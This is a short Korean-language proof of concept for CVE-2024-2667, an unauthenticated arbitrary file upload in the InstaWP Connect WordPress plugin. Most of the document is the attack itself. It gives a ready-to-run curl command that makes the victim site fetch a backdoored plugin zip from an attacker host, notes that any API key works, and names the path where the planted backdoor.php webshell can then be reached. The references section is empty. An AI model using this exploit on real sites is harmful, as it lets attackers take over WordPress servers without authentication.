
이것은 CVE-2024-2667(InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - 인증되지 않은 임의 파일 업로드)에 대한 POC입니다.
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
api_key -> 유효하거나 유효하지 않은 API 키를 사용할 수 있습니다.
override_plugin_zip -> 백도어가 포함된 악성 WordPress 플러그인이 들어 있는 zip 파일의 경로입니다.
가져온 후에는 http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php 를 통해 백도어에 접근할 수 있습니다. (디렉터리 이름이 malicious-plugin이고 backdoor.php가 해당 디렉터리 아래에 있다고 가정합니다.)
참조: